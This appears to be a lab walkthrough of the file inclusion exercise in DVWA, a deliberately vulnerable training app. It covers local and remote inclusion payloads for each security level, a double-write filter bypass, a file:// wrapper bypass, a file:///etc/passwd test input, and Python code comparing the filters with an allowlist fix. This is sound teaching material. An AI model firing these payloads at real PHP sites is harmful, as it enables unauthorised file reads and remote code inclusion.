0x01 Low
Source code analysis
<?php
// The page we wish to display
$file = $_GET[ 'page' ];
?>
The server side performs no filtering or validation of the page parameter at all before it is passed to include.
The intended use is to click one of the three links on the page; the server then includes the corresponding file and returns the result.
Local file inclusion (LFI)
The error message leaks the absolute path of the web root
Including phpinfo.php from the web root
Absolute path: http://192.168.115.134:8088/dvwa/vulnerabilities/fi/?page=C:\phpStudy\PHPTutorial\WWW\phpinfo.php
Relative path: http://192.168.115.134:8088/dvwa/vulnerabilities/fi/?page=../../../phpinfo.php
Remote file inclusion (RFI)
Place a phpinfo.php file on the remote (attacker-controlled) server with the following content
<?php
phpinfo();
?>
Include the phpinfo.php hosted on the remote server. Note that this only works when allow_url_include (and allow_url_fopen) is enabled in php.ini; allow_url_include is Off by default, and DVWA's install notes require turning it on.
http://192.168.115.134:8088/dvwa/vulnerabilities/fi/?page=http://192.168.31.87/phpinfo.php
0x02 Medium
Source code analysis
<?php
// The page we wish to display
$file = $_GET[ 'page' ];
// Input validation
$file = str_replace( array( "http://", "https://" ), "", $file );
$file = str_replace( array( "../", "..\\" ), "", $file );
?>
str_replace removes "http://", "https://", "../" and "..\" by replacing them with the empty string. Each token is removed in a single, non-recursive pass, and the text left behind is never re-scanned, so writing the token twice (nested inside itself) leaves one intact copy after filtering. This is the classic double-write bypass.
Local file inclusion (LFI)
Absolute path (contains none of the filtered tokens, so it passes unchanged): http://192.168.115.134:8088/dvwa/vulnerabilities/fi/?page=C:\phpStudy\PHPTutorial\WWW\phpinfo.php
Relative path ("..././" becomes "../" after one pass): http://192.168.115.134:8088/dvwa/vulnerabilities/fi/?page=..././..././..././phpinfo.php
Remote file inclusion (RFI)
"hthttp://tp://" becomes "http://" after one pass: http://192.168.115.134:8088/dvwa/vulnerabilities/fi/?page=hthttp://tp://192.168.31.87/phpinfo.php
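To make the single-pass behaviour concrete, here is an added example (not DVWA's code) that emulates the Medium-level filter in Python, since Python's str.replace removes all occurrences in one left-to-right pass exactly like PHP's str_replace. It also shows a repeat-until-stable variant, which defeats the double-write trick but is still a blacklist. The payload strings are the page's own Medium-level inputs plus two constructed controls.

```python
"""Added example (not DVWA's code): emulate the Medium-level str_replace filter
to show why one blacklist pass is bypassed by doubled tokens, and what a
fixed-point (repeat-until-stable) variant changes."""

from typing import Dict, Tuple

# Same tokens, same order as the two str_replace() calls in DVWA Medium.
URL_TOKENS = ("http://", "https://")
TRAVERSAL_TOKENS = ("../", "..\\")


def medium_filter(page: str) -> str:
    """One pass, mirroring DVWA Medium.

    Each token is removed left to right exactly once and the remaining text is
    never re-scanned, so '..././' collapses to '../' and 'hthttp://tp://'
    collapses to 'http://'.
    """
    for token in URL_TOKENS + TRAVERSAL_TOKENS:
        page = page.replace(token, "")
    return page


def strip_until_stable(page: str, max_rounds: int = 32) -> str:
    """Re-apply medium_filter until the input stops changing.

    Every productive pass shortens the string, so this terminates; max_rounds
    is only a guard. On exhaustion we raise so the caller rejects the input
    instead of including something half-cleaned.
    """
    for _ in range(max_rounds):
        cleaned = medium_filter(page)
        if cleaned == page:
            return cleaned
        page = cleaned
    raise ValueError("filter did not converge; reject the input")


# Constructed inputs: the page's Medium-level payloads plus two controls.
PAYLOADS: Dict[str, str] = {
    "lfi_double_write": "..././..././..././phpinfo.php",
    "rfi_double_write": "hthttp://tp://192.168.31.87/phpinfo.php",
    "lfi_absolute_windows": r"C:\phpStudy\PHPTutorial\WWW\phpinfo.php",
    "legit": "file1.php",
}


def compare_filters(page: str) -> Tuple[str, str]:
    """Return (result after one pass, result after reaching a fixed point)."""
    return medium_filter(page), strip_until_stable(page)


if __name__ == "__main__":
    for name, payload in PAYLOADS.items():
        single, stable = compare_filters(payload)
        print(f"{name:22} one pass -> {single!r:38} fixed point -> {stable!r}")
```

Running it shows the double-write payloads surviving a single pass as a clean traversal or URL, while the fixed-point variant reduces them to a bare filename or host. The absolute Windows path is untouched by both, which is the real lesson: a token blacklist does not define what may be included, it only removes strings the author thought of. The allowlist at the Impossible level is the correct fix.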
0x03 High
Source code analysis
<?php
// The page we wish to display
$file = $_GET[ 'page' ];
// Input validation
if( !fnmatch( "file*", $file ) && $file != "include.php" ) {
// This isn't the page we want!
echo "ERROR: File not found!";
exit;
}
?>
fnmatch checks the page parameter against the glob "file*": the value must start with "file" or be exactly "include.php", otherwise an error is printed and the script exits. This blocks the Low/Medium payloads ("../" and "http://" do not start with "file"), so remote inclusion is no longer possible.
The glob only constrains the first four characters, however, so the PHP file:// stream wrapper satisfies it, and file:// followed by an absolute path lets include read any file the web server can open.
Payload
http://192.168.115.134:8088/dvwa/vulnerabilities/fi/?page=file://C:\phpStudy\PHPTutorial\WWW\phpinfo.php
0x04 Impossible
Source code analysis
<?php
// The page we wish to display
$file = $_GET[ 'page' ];
// Only allow include.php or file{1..3}.php
if( $file != "include.php" && $file != "file1.php" && $file != "file2.php" && $file != "file3.php" ) {
// This isn't the page we want!
echo "ERROR: File not found!";
exit;
}
?>
This is the proper allowlist defence: the parameter is compared exactly against "include.php", "file1.php", "file2.php" and "file3.php", and anything else is rejected before it reaches include. Because user input never determines a path, wrapper or host, the file inclusion vulnerability is eliminated entirely.
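The following added example (not DVWA's code) emulates the High-level fnmatch check and the Impossible-level allowlist in Python so the two can be run side by side against the page's payloads. Python's fnmatch.fnmatchcase is the case-sensitive equivalent of PHP's fnmatch. The resolve_allowlisted helper and its base_dir value are assumptions illustrating the hardened pattern, not DVWA's implementation.

```python
"""Added example (not DVWA's code): emulate the High-level fnmatch() check and
the Impossible-level exact allowlist, and show which page values each accepts."""

import fnmatch
from typing import Dict, Optional

# Hypothetical server-side directory; an assumption for illustration only.
BASE_DIR = "/var/www/html/vulnerabilities/fi"


def high_check(page: str) -> bool:
    """DVWA High: accept anything matching the glob 'file*' or exactly 'include.php'.

    fnmatchcase mirrors PHP's case-sensitive fnmatch(). The pattern fixes only
    the first four characters, so the 'file://' stream wrapper passes.
    """
    return fnmatch.fnmatchcase(page, "file*") or page == "include.php"


ALLOWED = frozenset({"include.php", "file1.php", "file2.php", "file3.php"})


def impossible_check(page: str) -> bool:
    """DVWA Impossible: exact string comparison against a closed allowlist."""
    return page in ALLOWED


def resolve_allowlisted(page: str, base_dir: str = BASE_DIR) -> Optional[str]:
    """Hardened pattern (assumed, not DVWA's code): user input selects an entry
    from the allowlist; the server builds the path itself. Returns None for
    anything not on the list, so include() is never reached with raw input."""
    if not impossible_check(page):
        return None
    return f"{base_dir}/{page}"


# Constructed inputs: the page's High-level payload, its Linux equivalent,
# the legitimate pages, and the Low/Medium payloads that High already blocks.
CANDIDATES: Dict[str, str] = {
    "high_payload_windows": r"file://C:\phpStudy\PHPTutorial\WWW\phpinfo.php",
    "file_wrapper_linux": "file:///etc/passwd",
    "legit_file1": "file1.php",
    "legit_include": "include.php",
    "lfi_traversal": "../../../phpinfo.php",
    "rfi_http": "http://192.168.31.87/phpinfo.php",
}


def evaluate(page: str) -> Dict[str, bool]:
    """Which levels let this value through to include()?"""
    return {"high": high_check(page), "impossible": impossible_check(page)}


if __name__ == "__main__":
    for name, value in CANDIDATES.items():
        verdict = evaluate(value)
        print(f"{name:22} high={verdict['high']!s:5} impossible={verdict['impossible']!s:5} "
              f"resolved={resolve_allowlisted(value)!r}")
```

The output makes the difference visible: High rejects traversal and http:// but lets both file:// payloads through, while the allowlist accepts only the four expected names. A glob that anchors a prefix is still a pattern over attacker-controlled text; an exact match against server-defined values is the only check that does not need to anticipate the next wrapper or encoding.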